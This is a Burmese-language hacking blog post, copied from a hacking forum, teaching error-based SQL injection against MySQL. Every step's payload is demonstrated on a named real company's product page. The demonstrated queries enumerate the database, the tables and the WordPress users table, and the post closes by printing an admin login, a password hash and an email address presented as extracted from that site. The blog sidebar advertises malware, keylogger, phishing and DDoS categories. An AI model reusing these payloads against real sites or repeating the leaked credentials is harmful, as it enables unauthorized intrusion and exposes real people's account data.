Sunday, August 26, 2012

[Tut]Error-Based SQL Injection[/Tut]



Error-Based SQL Injection

Content
1.Introduction
2.About
3.Version စစ္မယ္
4.Database စစ္မယ္
5.Table name ရွာမယ္
6.Column name ရွာမယ္
7.Harvestin Data
8.Conclusion

1.Introduction
ဒီ...Error-based SQL injection အေၾကာင္းကုိဘယ္သူမွစတာမေတြ.ေသးလုိ. ဒီ Thread ေလးကုိဖြင့္ေပးလုိက္ပါတယ္...
မွားတာေတြရွိေနရင္လည္း ၀င္းျပီးေထာက္ျပေဆြေႏြးေပးၾကပါ... Posted Image
အရင္ဆုံး SQL Injection အေၾကာင္းကုိနဲနဲေလေဖာပါရေစ Posted Image

SQL Injection ကုိအေျခခံအားျဖင့္ 4မ်ိဳးခဲြျခားလုိ.ရပါတယ္... တခ်ဳိ.ကလည္းသုံးမ်ဳိးလုိ.ေျပာတယ္ ...
1.Blind Based (Also called Boolean)
2.Union Based (အသုံးမ်ားတယ္)
3.Error Based (အခုေျပာမွာ)
4.Double Query (ေနာက္ေျပာမွာ Posted Image)

နံပါတ္ ၁ ျဖစ္တဲ့ Blind ကေတာ္ေတာ္ပဲခက္ပါတယ္... Guessing Skill နဲ. Experience အမ်ားၾကီးလုိပါတယ္ ...လက္ေရွာင္တာမ်ားတယ္(အေနာ္လည္းတစ္ခါမွ ေအာင္ေအာင္ျမင္္ျမင္မထုိးဘူးေသးဘူး Posted Image)
Havij Free version မွာလည္းသုံးမရဘူး... Pro version ၀ယ္ႏိုင္ရင္ေကာင္းမယ္ (ကုိေဘာ့စ္ကုိပူဆာ ၾကပါ Posted Image)

နံပါတ္ ၂ Union ...ကေတာ့အားလုံးလည္းသိျပီးသား ...နာမည္ၾကီးမင္းသား... တစ္တစ္ခါခါ ... Firewall ခံေနတာကလြဲရင္ အသုံးမ်ားတယ္...

နံပါတ္ ၃ Error Based ...အရမ္းကုိေကာင္းတဲ့ Method ပါ... Union အလုပ္မလုပ္ေတာ့ရင္ သူကကယ္တင္ရွင္ပဲ...

နံပါတ္ ၄ Double Q ...သူက Error ရဲ.အဆက္ Query structure ကနာမည္နဲ.လုိက္ေအာင္ေတာ္ေတာ္ရွည္တယ္... သူ.ကုိသုံးရင္ "Bad Request"ဆုိျပီးျပတက္တယ္... သိပ္ေတာ့ၾကိဳက္ဘူး.....

ဒါေတြကအသုံးမ်ားတဲဟာေတြ ... တစ္ျခားအသုံးနည္းတဲ့ MS တုိ. Oracle တုိ. Header Based တုိ.တစ္ပုံၾကီးရွိေသးတယ္...
ကဲကဲေလေဖာတာရပ္ျပီး ....စၾကမယ္ဗ်ာ....

2.About
Error-Based ရဲ. Definition

A method of extracting information from a database when UNION SELECT function does not work at all. This can be done using a compiled query to extract the database information

သူ.ကိုဘယ္လုိအေျခအေနေတြမွာသုံးႏိုင္လဲ ....?
သူ.ကုိ Union သုံးေနရင္နဲ. ေအာက္က Error မ်ဳိးတစ္ခုခုေတြ.လာျပီဆုိသုံးႏုိင္ပါတယ္...

1. The Used Select Statements Have A Different Number Of Columns.
2. Unknown column 1 in order clause. (or 0)
3. Can't find your columns in the page source.
4. Error #1604

ကုိယ္က Union မသုံးခ်င္ဘူးဆုိလည္းသူ.ကိုတန္းသုံးခ်င္လည္းရတယ္...
Demo အေနနဲ.ဒီ site ကုိသုံးျပပါမယ္...
http://www.elansystems.co.za/product-item.php?product_items_id=11
 
3.Version စစ္မယ္

အရင္ဆုံး Version စစ္ဖုို.သုံးရမယ့္ Query က

or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1--


ဒါဆုိျဖစ္လာမယ့္ Url ပုံစံေလးက ...

http://www.elansyste...uct_items_id=11 or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1--

ရလာမယ့္ Result ကုိအခုလုိ Duplicate Entry ေလးနဲ.ျမင္ရပါမယ္ ...

Quote
Duplicate entry '5.1.63-0+squeeze1:1' for key 'group_key'
 
4.Database စစ္မယ္

DB Name ကုိသိခ်င္ရင္ သုံးရမယ့္ Query က
 
and (select 1 from (select count(*),concat((select(select concat(cast(database() as
 char),0x7e)) from information_schema.tables where table_schema=database() limit 0,
1),floor(rand(0)*2))x from information_schema.tables group by x)a) 
 
ဒါဆုိျဖစ္လာမယ့္ Url ပုံစံေလးက ...
 
http://www.elansystems.co.za/product-item.php?product_items_id=11 [color=#ffd700]and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)[/color]
 
ရလာမယ့္ Result ကုိအခုလုိ Duplicate Entry ေလးနဲ.ျမင္ရပါမယ္ ...

Quote
Duplicate entry 'elansyst_elan~1' for key 'group_key'
Notepad ေလးဖြင့္ျပီး အသာေလးတုိ.ထားလုိက္ ....
ကဲဘယ္လုိလဲ လြယ္လြယ္ေလးပဲမဟုတ္လား... Posted Image

5.Table name ေတြရွာမယ္
သုံးရမယ့္ Query က...
Quote
and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
သတိ limit Function ကုိသုံထားျပီး Table name ေတြကိုတစ္ခုခ်င္း... 1 တုိးျပီးႏုွိက္ထုတ္ပါမယ္....
limit 0,1 ဆုိတဲ့ေနရာမွာ 1,1 .... 2,1 ....စသျဖင့္ Table name ေတြတစ္ခုခ်င္းၾကည့္ရမွာပါ...

ဒါဆုိျဖစ္လာမယ့္ Url ပုံစံေလးက ...

http://www.elansystems.co.za/product-item.php?product_items_id=11 and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
ရလာမယ့္ Result ကုိအခုလုိ Duplicate Entry ေလးနဲ.ျမင္ရပါမယ္ ...
Quote
Duplicate entry 'dealer_tbl~1' for key 'group_key'
ဆက္ရွာပါ.. ကုိယ္စိတ္၀င္စားတာေတြ.ရင္ရပ္ေပါ့...
ဒီေနရာမွာ Table 'wp_users' ကစိတ္၀င္စားဖုိ. တစ္အားေကာင္းေနျပီ Posted Image
ဒီေတာ့ users ထဲက Columns ေတြကို ႏုွိက္ထုတ္ပါ့မယ္....

6. Column name ေတြရွာမယ္
သုံးရမယ့္ Query က...
Quote
and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0xTABLEHEX limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

ဒီေနရာမွာ ကုိယ္ေျပာင္းရမယ့္ေနရာေတြက ...
1.Limit
2.table_name ကုိHexခံမယ္ (http://www.swingnote...s/texttohex.php)
ဒီလုိနဲ. limit ကုိ ၁ စီတုိးျပီး ... Column name ေတြရပါလိမ့္မယ္...


ဒါဆုိျဖစ္လာမယ့္ Url ပုံစံေလးက ...
http://www.elansystems.co.za/product-item.php?product_items_id=11 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x77705f7573657273 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
ရလာမယ့္ Result ကုိအခုလုိ Duplicate Entry ေလးနဲ.ျမင္ရပါမယ္ ...
Quote
Duplicate entry 'ID~1' for key 'group_key'

cOlumn Name - user_name , user_password , user-email ကိုစိတ္၀င္စားတယ္ဟုတ္?
ok? .....

7.Harvesting Data
ကုိယ့္စိတ္၀င္စားမယ့္ Column name ေတြလည္းရျပီဆုိရင္ Extract လုပ္ပါေတာ့မယ္...
သုံရမယ္ Query ပုံစံက
Quote
and (select 1 from (select count(*),concat((select(select concat(cast(concat(COLUMN_NAME) as char),0x7e)) from Databasename.TABLENAME limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

ကိုယ္ေျပာင္းရမယ့္ေနရာေတြက ...
1.Limit function (count 1 by 1)
2.Databasename (ေစာေစာကတုိ.ထားတဲ့ name ကုိထည့္)
3.TableName (အခုေရာက္ေနတဲ့ table ေပ့ါ)
4.COLUMNNAME (ကို္ယ့္စိတ္၀င္စားတဲ့ COLUMN ေပါ့)

ဒါဆုိျဖစ္လာမယ့္ Url ပုံစံေလးက ...
http://www.elansystems.co.za/product-item.php?product_items_id=11 and (select 1 from (select count(*),concat((select(select concat(cast(concat(user_login) as char),0x7e)) from elansyst_elan.wp_users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
ရလာမယ့္ Result ကုိအခုလုိ Duplicate Entry ေလးနဲ.ျမင္ရပါမယ္ ...
Quote
Duplicate entry 'elan_admin~1' for key 'group_key'

ေနာက္ဆုံးရမယ္အေျဖကုိ ကိုယ့္ပါသာကုိယ္ပဲဆက္ျပီးလုပ္ၾကည့္ပါေတာ့
Quote
elan_admin,$P$BG5yVgzxllpqcLrfwWR9q2TJ8jo8MR0 , darren@elansystems.co.za

8.Conclusion
ဒီေလာက္ဆုိ လြယ္လြယ္ကူကူပဲသေဘာေပါက္မိလိမ့္မယ္ထင္ပါတယ္... ဒီနည္းကအသုံးလည္း၀င္ျပီးလြယ္လည္းလြယ္ကူပါတယ္...
အားနည္းခ်က္ေတြက
၁.Query ရွည္လုိ.အမွားအယြင္းရွိႏုိင္တယ္...
၂.Union မွာ Firewall နဲ.တုိးျပီးဆုိ WAF bypass လုပ္လုိ.ေကာင္းတယ္.. Error ဆုိစိတ္ညစ္ဖုိ.ေကာင္း (အေနာ္လည္းအခုထိလုပ္တက္ေသးဘူး ..လုပ္တက္တဲ့သူမ်ားေအာက္မွာတစ္ခါတည္းေျပာျပၾကပါ ... )
၃.နည္းနည္းလက္၀င္တယ္....

copy from http://mmhackforums.com//index.php?/topic/669-tuterror-based-sql-injectiontut/





 

ROCK FOREVER (MUSIC)

Pageviewers

CBOX

Manutd-Results

Label

Android (3) autorun (3) Backtrack (8) batch file (19) blogger (10) Botnet (2) browser (5) Brute Force (6) cafezee (2) cmd (5) Cookies (2) crack (12) Cracking (2) crypter (7) DDos (20) deepfreeze (4) defacing (1) defence (16) domain (4) Dos (9) downloader (4) ebomb (2) ebook (48) Exploit (26) firewall (3) game (2) gmail (11) google hack (16) Hacking Show (3) Hash (4) hosting (1) icon changer (1) ip adress (6) Keygen (1) keylogger (8) knowledge (67) locker (1) maintainence (8) network (17) news (31) other (35) passwoard viewer (7) password (12) Philosophy (6) Phishing (8) premium account (2) proxy (7) RAT (10) run commands (4) script (27) Shell code (10) shortcut Key (2) SMTP ports (1) social engineering (7) spammer (1) SQL Injection (30) Stealer.crack (5) tools (125) Tools Pack (4) tutorial (107) USB (3) virus (32) website (84) WiFi (4) word list (2)

Blogger templates

picoodle.com

Blogger news

Print Friendly and PDF

HOW IS MY SITE?

Powered by Blogger.

Followers

About Me

My Photo
Hacking= intelligent+techonology+psychology